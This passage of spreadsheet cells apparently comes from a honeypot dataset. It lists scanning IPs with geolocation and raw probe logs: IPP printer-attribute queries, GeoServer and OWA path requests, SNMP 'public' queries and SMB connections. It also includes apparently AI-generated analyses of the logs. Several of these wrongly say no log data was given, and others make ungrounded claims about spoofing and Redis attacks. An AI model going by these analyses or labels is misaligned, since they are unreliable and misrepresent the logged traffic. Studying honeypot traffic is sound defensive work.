en-us|ATTR printer-uri ipp://5.181.21.224:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '38.60.209.6:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.209.6:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.233.76.135:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.233.76.135:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.60.224.106:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.224.106:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '144.126.148.5:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://144.126.148.5:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '45.14.244.111:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://45.14.244.111:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '209.145.61.177:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://209.145.61.177:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0', 'method': 'GET', 'uri': '/geoserver/web/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.156 Not(A:Brand/24 YaBrowser/24.4.1.901 Yowser/2.5  Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.4.3.0 1.3.6.1.2.1.4.10.0', 'version': '1'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.40.123:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.253.40.123:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '185.74.222.213:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://185.74.222.213:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.118.77:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '203.29.241.98:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '103.113.68.70:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://103.113.68.70:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '193.57.136.113:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://193.57.136.113:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36', 'method': 'GET', 'uri': '/geoserver/web/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.60.171.39:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.171.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '66.94.127.183:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://193.57.138.110:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.160 Safari/537.36', 'method': 'GET', 'uri': '/owa/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.26.156.60:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.26.156.60:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '38.54.63.23:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.63.23:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.37.11:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.79.122:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.79.122:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '154.93.37.45:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.93.37.45:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36', 'method': 'GET', 'uri': '/geoserver/web/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.8.76:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.160 Safari/537.36_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41', 'method': 'GET', 'uri': '/geoserver/web/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.43.207:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.253.43.207:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78', 'method': 'GET', 'uri': '/geoserver/web/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.54.116.162:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_SMB:Incoming connection (64.62.197.47,44755)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.42.176:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.42.176:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 OPR/107.0.0.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '194.4.48.242:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.115.66:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}</t>
  </si>
  <si>
    <t>::ffff:403e:c52f</t>
  </si>
  <si>
    <t>Here are the possible malicious activities and corresponding attack types: &amp;&amp; No available log data provided. 
Activity cannot be determined from this information. 
Data is incomplete for analysis. &amp;&amp; An unknown IP is sending a request to obtain the attributes of a printer, specifically asking for its natural language and charset settings. This could be a reconnaissance attempt by an attacker to map out available printers on the network. The request also includes the printer's URI, which may indicate further malicious intentions. &amp;&amp; Possible malicious activity involves a POST request to print services on a remote system, potentially attempting unauthorized printing or data extraction. The User-Agent suggests a scripted or automated tool is being used. The request includes encoded content and a large payload. &amp;&amp; An IP address from 194.4.48.242 is sending a POST request to a server with an unusual content type, likely attempting to exploit the IPP service for malicious purposes. The request contains encoded data and a user agent that mimics a legitimate browser, indicating potential spoofing or tampering activities. &amp;&amp; No log activity detected for Redis service, suggesting potential attempt to access or exploit it was unsuccessful. This could indicate an attacker trying to use the honeypot's Redis service without success. No malicious action was actually performed. &amp;&amp; The data indicates potential malicious access attempts, specifically unauthorized interactions with Redis services, suggesting possible scanning or exploitation activities. The presence of unknown data values suggests incomplete or failed connections, which could be indicative of malicious probing. This may indicate reconnaissance efforts to identify vulnerable systems. &amp;&amp; No log data provided, unable to analyze or describe any malicious activity. &amp;&amp; There is no log data provided, so there is nothing to analyze. 
This means that we have no information about potential malicious activity.
No activity can be inferred or detected from this data. &amp;&amp; Possible malicious activity is an attacker attempting to retrieve sensitive information about a networked printer, including its location and capabilities. This could be used for reconnaissance or targeted attacks on the printer system. The request appears to be legitimate but may be a probe for further exploitation. &amp;&amp; No data provided, unable to analyze. &amp;&amp; No attempts were made to access LDAP service, suggesting normal operation or security measures preventing potential malicious activity. No suspicious connections detected for this service at this time, which is a positive sign. The lack of activity is not necessarily indicative of malicious intent. &amp;&amp; There is incomplete or missing data for LDAP service, suggesting potential scanning activity.
This could be an indication of reconnaissance by attackers to identify vulnerabilities.
No malicious interaction occurred yet.</t>
  </si>
  <si>
    <t>I don't have log data provided, but I can guide you through how to analyze such data. 
If you provide me with some sample log data, I'd be happy to help you identify the type of attack for each entry.
However, based on common honeypot attacks, here are a few examples:
* **Brute Force SSH**: Attempting multiple login attempts with various passwords.
* **Port Scanner**: Scanning open ports to find vulnerable services.
* **SQL Injection**: Trying to inject malicious SQL code into databases.
* **DDoS Attack**: Sending high amounts of traffic to overwhelm the server.
Please provide some sample log data for me to analyze. &amp;&amp; IP Scanning &amp;&amp; Redis Attack &amp;&amp; Port Scan &amp;&amp; I need to see the log data to analyze it. Please provide the log data, and I'll classify each entry with a short phrase describing the type of attack. &amp;&amp; Port Scan &amp;&amp; LDAP Attack &amp;&amp; LDAP Attack</t>
  </si>
  <si>
    <t>4a7caf680d950160885517b6c96b73a0</t>
  </si>
  <si>
    <t>110.24.32.12</t>
  </si>
  <si>
    <t>110-24-32-12.adsl.fetnet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H40&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>22&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>New Taipei</t>
  </si>
  <si>
    <t>Banqiao District</t>
  </si>
  <si>
    <t>1670029</t>
  </si>
  <si>
    <t>25.0114</t>
  </si>
  <si>
    <t>121.462</t>
  </si>
  <si>
    <t>9674</t>
  </si>
  <si>
    <t>Far EastTone Telecommunication Co., Ltd.</t>
  </si>
  <si>
    <t>Far EasTone Telecommunication Co., Ltd.</t>
  </si>
  <si>
    <t>FETNET</t>
  </si>
  <si>
    <t>::ffff:6e18:200c</t>
  </si>
  <si>
    <t>0b6918592a31760b63a6e49d58fef7a1</t>
  </si>
  <si>
    <t>118.194.250.31</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H6&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H21</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;80&amp;&amp;3306&amp;&amp;15607&amp;&amp;21&amp;&amp;445&amp;&amp;50264&amp;&amp;50766&amp;&amp;6379&amp;&amp;1521&amp;&amp;39696&amp;&amp;161&amp;&amp;5900&amp;&amp;NA&amp;&amp;110&amp;&amp;6667</t>
  </si>
  <si>
    <t>1609350</t>
  </si>
  <si>
    <t>10700</t>
  </si>
  <si>
    <t>13.7563</t>
  </si>
  <si>
    <t>100.502</t>
  </si>
  <si>
    <t>GET&amp;&amp;connection&amp;&amp;command&amp;&amp;login&amp;&amp;NA&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,55520)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,38692)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,57438)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,36178)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,94.131.8.76)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,52826)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,52834)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,52850)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,52858)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,41200)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,41216)}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_IRC:NA}</t>
  </si>
  <si>
    <t>::ffff:76c2:fa1f</t>
  </si>
  <si>
    <t>There is no log data provided, therefore there is nothing to analyze or describe regarding possible malicious activity.</t>
  </si>
  <si>
    <t>5083faad9c16066e54dd9f71ae1f11b3</t>
  </si>
  <si>
    <t>212.50.57.143</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;2419&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>Ankara</t>
  </si>
  <si>
    <t>Çankaya</t>
  </si>
  <si>
    <t>323786</t>
  </si>
  <si>
    <t>39.9014</t>
  </si>
  <si>
    <t>32.8121</t>
  </si>
  <si>
    <t>7155</t>
  </si>
  <si>
    <t>ViaSat,Inc.</t>
  </si>
  <si>
    <t>ESER-TOOWAY</t>
  </si>
  <si>
    <t>Eser Telekom A.S.</t>
  </si>
  <si>
    <t>::ffff:d432:398f</t>
  </si>
  <si>
    <t>fc3cbbbf99799517c363e198aa43c580</t>
  </si>
  <si>
    <t>178.217.218.183</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_DNS_H43&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;39009&amp;&amp;9968&amp;&amp;NA</t>
  </si>
  <si>
    <t>PL</t>
  </si>
  <si>
    <t>Poland</t>
  </si>
  <si>
    <t>24</t>
  </si>
  <si>
    <t>Silesia</t>
  </si>
  <si>
    <t>Sosnowiec</t>
  </si>
  <si>
    <t>3085128</t>
  </si>
  <si>
    <t>50.2868</t>
  </si>
  <si>
    <t>19.1038</t>
  </si>
  <si>
    <t>197181</t>
  </si>
  <si>
    <t>NETICO S.C.</t>
  </si>
  <si>
    <t>Netico S.C.</t>
  </si>
  <si>
    <t>::ffff:b2d9:dab7</t>
  </si>
  <si>
    <t>9b5402ece9ca4b3fd4c9b61355d5c955</t>
  </si>
  <si>
    <t>194.187.176.188</t>
  </si>
  <si>
